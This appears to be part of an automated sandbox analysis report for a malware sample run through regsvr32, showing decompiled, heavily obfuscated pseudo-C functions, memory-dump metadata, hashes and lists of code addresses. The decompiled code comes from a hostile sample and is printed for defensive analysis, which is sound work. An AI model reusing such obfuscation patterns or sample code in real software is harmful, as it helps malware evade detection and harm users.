                                                                                                                				_a24 = _a24 ^ 0x338347c6;
                                                                                                                				_a52 = 0x92c06b;
                                                                                                                				_a52 = _a52 ^ 0x00901884;
                                                                                                                				_a48 = 0xe644d6;
                                                                                                                				_a48 = _a48 << 0xd;
                                                                                                                				_a48 = _a48 ^ 0xc899afdb;
                                                                                                                				do {
                                                                                                                					while(_t85 != 0x274709f) {
                                                                                                                						if(_t85 == 0x3ac7409) {
                                                                                                                							_t85 = 0x3eb1887;
                                                                                                                							continue;
                                                                                                                						} else {
                                                                                                                							if(_t85 == 0x3eb1887) {
                                                                                                                								E001A6DD9( &_a72, _a40, _a32, _t82, _a28);
                                                                                                                								_t103 = _t103 + 0xc;
                                                                                                                								_t85 = 0x274709f;
                                                                                                                								continue;
                                                                                                                							} else {
                                                                                                                								_t110 = _t85 - 0xa1a2c51;
                                                                                                                								if(_t85 != 0xa1a2c51) {
                                                                                                                									goto L16;
                                                                                                                								} else {
                                                                                                                									E001AA903(_a52, _t96 + 0x20, _t110, _a48,  &_a72);
                                                                                                                									_t98 =  !=  ? 1 : _t98;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L10:
                                                                                                                						return _t98;
                                                                                                                					}
                                                                                                                					_t77 = E001B6D3A( &_a72, _t96 + 0x1c, _a44, _a36, _a24);
                                                                                                                					_t103 = _t103 + 0xc;
                                                                                                                					__eflags = _t77;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						_t85 = 0x38dd9d8;
                                                                                                                						goto L16;
                                                                                                                					} else {
                                                                                                                						_t85 = 0xa1a2c51;
                                                                                                                						continue;
                                                                                                                					}
                                                                                                                					goto L10;
                                                                                                                					L16:
                                                                                                                					__eflags = _t85 - 0x38dd9d8;
                                                                                                                				} while (__eflags != 0);
                                                                                                                				goto L10;
                                                                                                                			}










                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Si
                                                                                                                • API String ID: 0-3544519720
                                                                                                                • Opcode ID: 772288a6c65f622235bba70c83a109ef0ccd7a2ca8f4960e84c22babaf34fb0b
                                                                                                                • Instruction ID: 6ae59a930668dfc30e67cb4df43a31b3b97922fc7fbdcfa0b2bb061f7b73d05c
                                                                                                                • Opcode Fuzzy Hash: 772288a6c65f622235bba70c83a109ef0ccd7a2ca8f4960e84c22babaf34fb0b
                                                                                                                • Instruction Fuzzy Hash: C73157B64093428FC718CF60859A02FFBE4FF95758F004A0EF196A6121D7B0CA098F87
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 89%
                                                                                                                			E001A2F36(void* __ecx, unsigned int __edx) {
                                                                                                                				void* _t41;
                                                                                                                				unsigned int _t45;
                                                                                                                				unsigned int _t48;
                                                                                                                				signed int _t53;
                                                                                                                				unsigned int* _t57;
                                                                                                                				unsigned int _t60;
                                                                                                                				char* _t61;
                                                                                                                				unsigned int _t62;
                                                                                                                				void* _t63;
                                                                                                                				signed int _t65;
                                                                                                                				void* _t67;
                                                                                                                				void* _t68;
                                                                                                                
                                                                                                                				_t61 =  *((intOrPtr*)(_t67 + 0x24));
                                                                                                                				_t62 = __edx;
                                                                                                                				_push(_t61);
                                                                                                                				_push( *((intOrPtr*)(_t67 + 0x24)));
                                                                                                                				_push( *((intOrPtr*)(_t67 + 0x24)));
                                                                                                                				_push(__edx);
                                                                                                                				E001AC98A(_t41);
                                                                                                                				 *(_t67 + 0x38) = 0xce6a6d;
                                                                                                                				 *(_t67 + 0x38) =  *(_t67 + 0x38) ^ 0x9f0168be;
                                                                                                                				_t68 = _t67 + 0x14;
                                                                                                                				 *(_t68 + 0x24) =  *(_t68 + 0x24) << 0xa;
                                                                                                                				 *(_t68 + 0x24) =  *(_t68 + 0x24) ^ 0xbbc1154a;
                                                                                                                				 *(_t68 + 0x24) =  *(_t68 + 0x24) ^ 0x87c82040;
                                                                                                                				 *(_t68 + 0x14) = 0xe19b4b;
                                                                                                                				 *(_t68 + 0x14) =  *(_t68 + 0x14) | 0x68a41fb6;
                                                                                                                				 *(_t68 + 0x14) =  *(_t68 + 0x14) ^ 0x68e987ef;
                                                                                                                				 *(_t68 + 0x10) = 0xe75e04;
                                                                                                                				 *(_t68 + 0x10) =  *(_t68 + 0x10) + 0xecfe;
                                                                                                                				_t53 = __edx >> 2;
                                                                                                                				 *(_t68 + 0x10) =  *(_t68 + 0x10) * 0x26;
                                                                                                                				 *(_t68 + 0x10) =  *(_t68 + 0x10) >> 7;
                                                                                                                				 *(_t68 + 0x10) =  *(_t68 + 0x10) ^ 0x0045e97a;
                                                                                                                				 *(_t68 + 0xc) = 0x2a40c4;
                                                                                                                				 *(_t68 + 0xc) =  *(_t68 + 0xc) | 0x2c657b96;
                                                                                                                				 *(_t68 + 0xc) =  *(_t68 + 0xc) << 4;
                                                                                                                				 *(_t68 + 0xc) =  *(_t68 + 0xc) << 4;
                                                                                                                				 *(_t68 + 0xc) =  *(_t68 + 0xc) ^ 0x6f77ff1f;
                                                                                                                				if(_t53 != 0) {
                                                                                                                					_t65 = _t53;
                                                                                                                					do {
                                                                                                                						 *_t61 = E001B25AA();
                                                                                                                						_t61 = _t61 + 4;
                                                                                                                						_t65 = _t65 - 1;
                                                                                                                					} while (_t65 != 0);
                                                                                                                				}
                                                                                                                				_t45 = _t53 << 2;
                                                                                                                				_t63 = _t62 - _t45;
                                                                                                                				if(_t63 != 0) {
                                                                                                                					_t45 = E001B25AA();
                                                                                                                					_t60 = _t45 >> 0x10;
                                                                                                                					 *_t61 = _t60 >> 8;
                                                                                                                					_t57 = _t61 + 1;
                                                                                                                					if(_t63 > 1) {
                                                                                                                						 *_t57 = _t60;
                                                                                                                						_t57 =  &(_t57[0]);
                                                                                                                					}
                                                                                                                					if(_t63 > 2) {
                                                                                                                						_t48 = _t45 >> 8;
                                                                                                                						 *_t57 = _t48;
                                                                                                                						return _t48;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t45;
                                                                                                                			}
















                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: zE
                                                                                                                • API String ID: 0-1652785882
                                                                                                                • Opcode ID: b641ca8c5750b17f19e4ec43b43a65263363f4c16b8fb94a6cd6cfed2e7dd6fd
                                                                                                                • Instruction ID: e3f3590ed1b6efce870153ff7978aa5c2d0394194afb8dcce5f112e78e2b0d37
                                                                                                                • Opcode Fuzzy Hash: b641ca8c5750b17f19e4ec43b43a65263363f4c16b8fb94a6cd6cfed2e7dd6fd
                                                                                                                • Instruction Fuzzy Hash: 1821CC714083429FC314DF26C58A44FFBE0FAD1758F408A6CF4AAA6221C7B5DA19CB92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 95%
                                                                                                                			E001ACA3C() {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				intOrPtr _v36;
                                                                                                                				intOrPtr _v40;
                                                                                                                				signed int _t60;
                                                                                                                				signed int _t61;
                                                                                                                
                                                                                                                				_v32 = _v32 & 0x00000000;
                                                                                                                				_v40 = 0x3bb39;
                                                                                                                				_v36 = 0xb7ef55;
                                                                                                                				_v8 = 0xb69831;
                                                                                                                				_v8 = _v8 >> 6;
                                                                                                                				_t60 = 9;
                                                                                                                				_v8 = _v8 / _t60;
                                                                                                                				_v8 = _v8 + 0x7244;
                                                                                                                				_v8 = _v8 ^ 0x0000c36b;
                                                                                                                				_v24 = 0xe9606f;
                                                                                                                				_v24 = _v24 ^ 0x59c12290;
                                                                                                                				_v24 = _v24 ^ 0x592227a0;
                                                                                                                				_v20 = 0xc896cb;
                                                                                                                				_v20 = _v20 ^ 0xb54477d0;
                                                                                                                				_v20 = _v20 ^ 0xb58f3dc2;
                                                                                                                				_v16 = 0x15a03a;
                                                                                                                				_t61 = 0x3e;
                                                                                                                				_v16 = _v16 / _t61;
                                                                                                                				_v16 = _v16 ^ 0x00037a08;
                                                                                                                				_v12 = 0xc0d420;
                                                                                                                				_v12 = _v12 >> 0x10;
                                                                                                                				_v12 = _v12 | 0x5060fa95;
                                                                                                                				_v12 = _v12 ^ 0x50607b06;
                                                                                                                				_push(_v12);
                                                                                                                				_v28 = _v8;
                                                                                                                				E001B86EE(_v20,  &_v28, _v16, _t61);
                                                                                                                				return _v28;
                                                                                                                			}















                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: o`
                                                                                                                • API String ID: 0-2455046745
                                                                                                                • Opcode ID: 2d71cbd1b263e8fc0cf64166de4a08ed7d43f85a706d30546d994ae3fdd29e7e
                                                                                                                • Instruction ID: 39842ef83c5acf5928eacc5310e3d0116f84a6a6e166ff324a0476c677e9d079
                                                                                                                • Opcode Fuzzy Hash: 2d71cbd1b263e8fc0cf64166de4a08ed7d43f85a706d30546d994ae3fdd29e7e
                                                                                                                • Instruction Fuzzy Hash: 1821DE71D01209EBDF08CFE0CA4A5AEFBB5EB44708F20818AD115A6240DBB51B45DB80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1003E709(void* __eax, void* __ecx) {
                                                                                                                				void* _t196;
                                                                                                                				signed int _t197;
                                                                                                                				void* _t200;
                                                                                                                				signed char _t206;
                                                                                                                				signed char _t207;
                                                                                                                				signed char _t208;
                                                                                                                				signed char _t210;
                                                                                                                				signed char _t211;
                                                                                                                				signed int _t216;
                                                                                                                				signed int _t316;
                                                                                                                				void* _t319;
                                                                                                                				void* _t321;
                                                                                                                				void* _t323;
                                                                                                                				void* _t325;
                                                                                                                				void* _t327;
                                                                                                                				void* _t330;
                                                                                                                				void* _t332;
                                                                                                                				void* _t334;
                                                                                                                				void* _t337;
                                                                                                                				void* _t339;
                                                                                                                				void* _t341;
                                                                                                                				void* _t344;
                                                                                                                				void* _t346;
                                                                                                                				void* _t348;
                                                                                                                				void* _t351;
                                                                                                                				void* _t353;
                                                                                                                				void* _t355;
                                                                                                                				void* _t358;
                                                                                                                				void* _t360;
                                                                                                                				void* _t362;
                                                                                                                
                                                                                                                				_t200 = __ecx;
                                                                                                                				_t196 = __eax;
                                                                                                                				if( *((intOrPtr*)(__eax - 0x1f)) ==  *((intOrPtr*)(__ecx - 0x1f))) {
                                                                                                                					_t316 = 0;
                                                                                                                					L17:
                                                                                                                					if(_t316 != 0) {
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                					_t206 =  *(_t196 - 0x1b);
                                                                                                                					if(_t206 ==  *(_t200 - 0x1b)) {
                                                                                                                						_t316 = 0;
                                                                                                                						L28:
                                                                                                                						if(_t316 != 0) {
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						_t207 =  *(_t196 - 0x17);
                                                                                                                						if(_t207 ==  *(_t200 - 0x17)) {
                                                                                                                							_t316 = 0;
                                                                                                                							L39:
                                                                                                                							if(_t316 != 0) {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							_t208 =  *(_t196 - 0x13);
                                                                                                                							if(_t208 ==  *(_t200 - 0x13)) {
                                                                                                                								_t316 = 0;
                                                                                                                								L50:
                                                                                                                								if(_t316 != 0) {
                                                                                                                									goto L1;
                                                                                                                								}
                                                                                                                								if( *(_t196 - 0xf) ==  *(_t200 - 0xf)) {
                                                                                                                									_t316 = 0;
                                                                                                                									L61:
                                                                                                                									if(_t316 != 0) {
                                                                                                                										goto L1;
                                                                                                                									}
                                                                                                                									_t210 =  *(_t196 - 0xb);
                                                                                                                									if(_t210 ==  *(_t200 - 0xb)) {
                                                                                                                										_t316 = 0;
                                                                                                                										L72:
                                                                                                                										if(_t316 != 0) {
                                                                                                                											goto L1;
                                                                                                                										}
                                                                                                                										_t211 =  *(_t196 - 7);
                                                                                                                										if(_t211 ==  *(_t200 - 7)) {
                                                                                                                											_t316 = 0;
                                                                                                                											L83:
                                                                                                                											if(_t316 != 0) {
                                                                                                                												goto L1;
                                                                                                                											}
                                                                                                                											_t319 = ( *(_t196 - 3) & 0x000000ff) - ( *(_t200 - 3) & 0x000000ff);
                                                                                                                											if(_t319 == 0) {
                                                                                                                												L5:
                                                                                                                												_t321 = ( *(_t196 - 2) & 0x000000ff) - ( *(_t200 - 2) & 0x000000ff);
                                                                                                                												if(_t321 == 0) {
                                                                                                                													L3:
                                                                                                                													_t197 = ( *(_t196 - 1) & 0x000000ff) - ( *(_t200 - 1) & 0x000000ff);
                                                                                                                													if(_t197 != 0) {
                                                                                                                														_t197 = (0 | _t197 > 0x00000000) + (0 | _t197 > 0x00000000) - 1;
                                                                                                                													}
                                                                                                                													L2:
                                                                                                                													return _t197;
                                                                                                                												}
                                                                                                                												_t216 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
                                                                                                                												if(_t216 != 0) {
                                                                                                                													L86:
                                                                                                                													_t197 = _t216;
                                                                                                                													goto L2;
                                                                                                                												} else {
                                                                                                                													goto L3;
                                                                                                                												}
                                                                                                                											}
                                                                                                                											_t216 = (0 | _t319 > 0x00000000) + (0 | _t319 > 0x00000000) - 1;
                                                                                                                											if(_t216 == 0) {
                                                                                                                												goto L5;
                                                                                                                											}
                                                                                                                											goto L86;
                                                                                                                										}
                                                                                                                										_t323 = (_t211 & 0x000000ff) - ( *(_t200 - 7) & 0x000000ff);
                                                                                                                										if(_t323 == 0) {
                                                                                                                											L76:
                                                                                                                											_t325 = ( *(_t196 - 6) & 0x000000ff) - ( *(_t200 - 6) & 0x000000ff);
                                                                                                                											if(_t325 == 0) {
                                                                                                                												L78:
                                                                                                                												_t327 = ( *(_t196 - 5) & 0x000000ff) - ( *(_t200 - 5) & 0x000000ff);
                                                                                                                												if(_t327 == 0) {
                                                                                                                													L80:
                                                                                                                													_t316 = ( *(_t196 - 4) & 0x000000ff) - ( *(_t200 - 4) & 0x000000ff);
                                                                                                                													if(_t316 != 0) {
                                                                                                                														_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                                                													}
                                                                                                                													goto L83;
                                                                                                                												}
                                                                                                                												_t316 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
                                                                                                                												if(_t316 != 0) {
                                                                                                                													goto L1;
                                                                                                                												}
                                                                                                                												goto L80;
                                                                                                                											}
                                                                                                                											_t316 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
                                                                                                                											if(_t316 != 0) {
                                                                                                                												goto L1;
                                                                                                                											}
                                                                                                                											goto L78;
                                                                                                                										}
                                                                                                                										_t316 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
                                                                                                                										if(_t316 != 0) {
                                                                                                                											goto L1;
                                                                                                                										}
                                                                                                                										goto L76;
                                                                                                                									}
                                                                                                                									_t330 = (_t210 & 0x000000ff) - ( *(_t200 - 0xb) & 0x000000ff);
                                                                                                                									if(_t330 == 0) {
                                                                                                                										L65:
                                                                                                                										_t332 = ( *(_t196 - 0xa) & 0x000000ff) - ( *(_t200 - 0xa) & 0x000000ff);
                                                                                                                										if(_t332 == 0) {
                                                                                                                											L67:
                                                                                                                											_t334 = ( *(_t196 - 9) & 0x000000ff) - ( *(_t200 - 9) & 0x000000ff);
                                                                                                                											if(_t334 == 0) {
                                                                                                                												L69:
                                                                                                                												_t316 = ( *(_t196 - 8) & 0x000000ff) - ( *(_t200 - 8) & 0x000000ff);
                                                                                                                												if(_t316 != 0) {
                                                                                                                													_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                                                												}
                                                                                                                												goto L72;
                                                                                                                											}
                                                                                                                											_t316 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
                                                                                                                											if(_t316 != 0) {
                                                                                                                												goto L1;
                                                                                                                											}
                                                                                                                											goto L69;
                                                                                                                										}
                                                                                                                										_t316 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
                                                                                                                										if(_t316 != 0) {
                                                                                                                											goto L1;
                                                                                                                										}
                                                                                                                										goto L67;
                                                                                                                									}
                                                                                                                									_t316 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
                                                                                                                									if(_t316 != 0) {
                                                                                                                										goto L1;
                                                                                                                									}
                                                                                                                									goto L65;
                                                                                                                								}
                                                                                                                								_t337 = ( *(_t196 - 0xf) & 0x000000ff) - ( *(_t200 - 0xf) & 0x000000ff);
                                                                                                                								if(_t337 == 0) {
                                                                                                                									L54:
                                                                                                                									_t339 = ( *(_t196 - 0xe) & 0x000000ff) - ( *(_t200 - 0xe) & 0x000000ff);
                                                                                                                									if(_t339 == 0) {
                                                                                                                										L56:
                                                                                                                										_t341 = ( *(_t196 - 0xd) & 0x000000ff) - ( *(_t200 - 0xd) & 0x000000ff);
                                                                                                                										if(_t341 == 0) {
                                                                                                                											L58:
                                                                                                                											_t316 = ( *(_t196 - 0xc) & 0x000000ff) - ( *(_t200 - 0xc) & 0x000000ff);
                                                                                                                											if(_t316 != 0) {
                                                                                                                												_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                                                											}
                                                                                                                											goto L61;
                                                                                                                										}
                                                                                                                										_t316 = (0 | _t341 > 0x00000000) + (0 | _t341 > 0x00000000) - 1;
                                                                                                                										if(_t316 != 0) {
                                                                                                                											goto L1;
                                                                                                                										}
                                                                                                                										goto L58;
                                                                                                                									}
                                                                                                                									_t316 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
                                                                                                                									if(_t316 != 0) {
                                                                                                                										goto L1;
                                                                                                                									}
                                                                                                                									goto L56;
                                                                                                                								}
                                                                                                                								_t316 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
                                                                                                                								if(_t316 != 0) {
                                                                                                                									goto L1;
                                                                                                                								}
                                                                                                                								goto L54;
                                                                                                                							}
                                                                                                                							_t344 = (_t208 & 0x000000ff) - ( *(_t200 - 0x13) & 0x000000ff);
                                                                                                                							if(_t344 == 0) {
                                                                                                                								L43:
                                                                                                                								_t346 = ( *(_t196 - 0x12) & 0x000000ff) - ( *(_t200 - 0x12) & 0x000000ff);
                                                                                                                								if(_t346 == 0) {
                                                                                                                									L45:
                                                                                                                									_t348 = ( *(_t196 - 0x11) & 0x000000ff) - ( *(_t200 - 0x11) & 0x000000ff);
                                                                                                                									if(_t348 == 0) {
                                                                                                                										L47:
                                                                                                                										_t316 = ( *(_t196 - 0x10) & 0x000000ff) - ( *(_t200 - 0x10) & 0x000000ff);
                                                                                                                										if(_t316 != 0) {
                                                                                                                											_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                                                										}
                                                                                                                										goto L50;
                                                                                                                									}
                                                                                                                									_t316 = (0 | _t348 > 0x00000000) + (0 | _t348 > 0x00000000) - 1;
                                                                                                                									if(_t316 != 0) {
                                                                                                                										goto L1;
                                                                                                                									}
                                                                                                                									goto L47;
                                                                                                                								}
                                                                                                                								_t316 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
                                                                                                                								if(_t316 != 0) {
                                                                                                                									goto L1;
                                                                                                                								}
                                                                                                                								goto L45;
                                                                                                                							}
                                                                                                                							_t316 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
                                                                                                                							if(_t316 != 0) {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							goto L43;
                                                                                                                						}
                                                                                                                						_t351 = (_t207 & 0x000000ff) - ( *(_t200 - 0x17) & 0x000000ff);
                                                                                                                						if(_t351 == 0) {
                                                                                                                							L32:
                                                                                                                							_t353 = ( *(_t196 - 0x16) & 0x000000ff) - ( *(_t200 - 0x16) & 0x000000ff);
                                                                                                                							if(_t353 == 0) {
                                                                                                                								L34:
                                                                                                                								_t355 = ( *(_t196 - 0x15) & 0x000000ff) - ( *(_t200 - 0x15) & 0x000000ff);
                                                                                                                								if(_t355 == 0) {
                                                                                                                									L36:
                                                                                                                									_t316 = ( *(_t196 - 0x14) & 0x000000ff) - ( *(_t200 - 0x14) & 0x000000ff);
                                                                                                                									if(_t316 != 0) {
                                                                                                                										_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                                                									}
                                                                                                                									goto L39;
                                                                                                                								}
                                                                                                                								_t316 = (0 | _t355 > 0x00000000) + (0 | _t355 > 0x00000000) - 1;
                                                                                                                								if(_t316 != 0) {
                                                                                                                									goto L1;
                                                                                                                								}
                                                                                                                								goto L36;
                                                                                                                							}
                                                                                                                							_t316 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
                                                                                                                							if(_t316 != 0) {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							goto L34;
                                                                                                                						}
                                                                                                                						_t316 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
                                                                                                                						if(_t316 != 0) {
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						goto L32;
                                                                                                                					}
                                                                                                                					_t358 = (_t206 & 0x000000ff) - ( *(_t200 - 0x1b) & 0x000000ff);
                                                                                                                					if(_t358 == 0) {
                                                                                                                						L21:
                                                                                                                						_t360 = ( *(_t196 - 0x1a) & 0x000000ff) - ( *(_t200 - 0x1a) & 0x000000ff);
                                                                                                                						if(_t360 == 0) {
                                                                                                                							L23:
                                                                                                                							_t362 = ( *(_t196 - 0x19) & 0x000000ff) - ( *(_t200 - 0x19) & 0x000000ff);
                                                                                                                							if(_t362 == 0) {
                                                                                                                								L25:
                                                                                                                								_t316 = ( *(_t196 - 0x18) & 0x000000ff) - ( *(_t200 - 0x18) & 0x000000ff);
                                                                                                                								if(_t316 != 0) {
                                                                                                                									_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                                                								}
                                                                                                                								goto L28;
                                                                                                                							}
                                                                                                                							_t316 = (0 | _t362 > 0x00000000) + (0 | _t362 > 0x00000000) - 1;
                                                                                                                							if(_t316 != 0) {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							goto L25;
                                                                                                                						}
                                                                                                                						_t316 = (0 | _t360 > 0x00000000) + (0 | _t360 > 0x00000000) - 1;
                                                                                                                						if(_t316 != 0) {
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						goto L23;
                                                                                                                					}
                                                                                                                					_t316 = (0 | _t358 > 0x00000000) + (0 | _t358 > 0x00000000) - 1;
                                                                                                                					if(_t316 != 0) {
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                					goto L21;
                                                                                                                				} else {
                                                                                                                					__edx =  *(__ecx - 0x1f) & 0x000000ff;
                                                                                                                					__esi =  *(__eax - 0x1f) & 0x000000ff;
                                                                                                                					__esi = ( *(__eax - 0x1f) & 0x000000ff) - ( *(__ecx - 0x1f) & 0x000000ff);
                                                                                                                					if(__esi == 0) {
                                                                                                                						L10:
                                                                                                                						__esi =  *(__eax - 0x1e) & 0x000000ff;
                                                                                                                						__edx =  *(__ecx - 0x1e) & 0x000000ff;
                                                                                                                						__esi = ( *(__eax - 0x1e) & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
                                                                                                                						if(__esi == 0) {
                                                                                                                							L12:
                                                                                                                							__esi =  *(__eax - 0x1d) & 0x000000ff;
                                                                                                                							__edx =  *(__ecx - 0x1d) & 0x000000ff;
                                                                                                                							__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                                                                                                                							if(__esi == 0) {
                                                                                                                								L14:
                                                                                                                								__esi =  *(__eax - 0x1c) & 0x000000ff;
                                                                                                                								__edx =  *(__ecx - 0x1c) & 0x000000ff;
                                                                                                                								__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                                                                                                                								if(__esi != 0) {
                                                                                                                									0 = 0 | __esi > 0x00000000;
                                                                                                                									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                									__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                								}
                                                                                                                								goto L17;
                                                                                                                							}
                                                                                                                							0 = 0 | __esi > 0x00000000;
                                                                                                                							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                							__esi = __edx;
                                                                                                                							if(__edx != 0) {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							goto L14;
                                                                                                                						}
                                                                                                                						0 = 0 | __esi > 0x00000000;
                                                                                                                						__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                						__esi = __edx;
                                                                                                                						if(__edx != 0) {
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						goto L12;
                                                                                                                					}
                                                                                                                					0 = 0 | __esi > 0x00000000;
                                                                                                                					__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                					__esi = __edx;
                                                                                                                					if(__edx != 0) {
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                					goto L10;
                                                                                                                				}
                                                                                                                				L1:
                                                                                                                				_t197 = _t316;
                                                                                                                				goto L2;
                                                                                                                			}

































                                                                                                                0x00000000
                                                                                                                0x1003e9ab
                                                                                                                0x1003e986
                                                                                                                0x1003e98a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e98a
                                                                                                                0x1003e965
                                                                                                                0x1003e969
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e969
                                                                                                                0x1003e8c6
                                                                                                                0x1003e8c8
                                                                                                                0x1003e8df
                                                                                                                0x1003e8e7
                                                                                                                0x1003e8e9
                                                                                                                0x1003e900
                                                                                                                0x1003e908
                                                                                                                0x1003e90a
                                                                                                                0x1003e921
                                                                                                                0x1003e929
                                                                                                                0x1003e92b
                                                                                                                0x1003e938
                                                                                                                0x1003e938
                                                                                                                0x00000000
                                                                                                                0x1003e92b
                                                                                                                0x1003e917
                                                                                                                0x1003e91b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e91b
                                                                                                                0x1003e8f6
                                                                                                                0x1003e8fa
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e8fa
                                                                                                                0x1003e8d5
                                                                                                                0x1003e8d9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e8d9
                                                                                                                0x1003e837
                                                                                                                0x1003e839
                                                                                                                0x1003e850
                                                                                                                0x1003e858
                                                                                                                0x1003e85a
                                                                                                                0x1003e871
                                                                                                                0x1003e879
                                                                                                                0x1003e87b
                                                                                                                0x1003e892
                                                                                                                0x1003e89a
                                                                                                                0x1003e89c
                                                                                                                0x1003e8a9
                                                                                                                0x1003e8a9
                                                                                                                0x00000000
                                                                                                                0x1003e89c
                                                                                                                0x1003e888
                                                                                                                0x1003e88c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e88c
                                                                                                                0x1003e867
                                                                                                                0x1003e86b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e86b
                                                                                                                0x1003e846
                                                                                                                0x1003e84a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e84a
                                                                                                                0x1003e7a8
                                                                                                                0x1003e7aa
                                                                                                                0x1003e7c1
                                                                                                                0x1003e7c9
                                                                                                                0x1003e7cb
                                                                                                                0x1003e7e2
                                                                                                                0x1003e7ea
                                                                                                                0x1003e7ec
                                                                                                                0x1003e803
                                                                                                                0x1003e80b
                                                                                                                0x1003e80d
                                                                                                                0x1003e81a
                                                                                                                0x1003e81a
                                                                                                                0x00000000
                                                                                                                0x1003e80d
                                                                                                                0x1003e7f9
                                                                                                                0x1003e7fd
                                                                                                                0x00000000
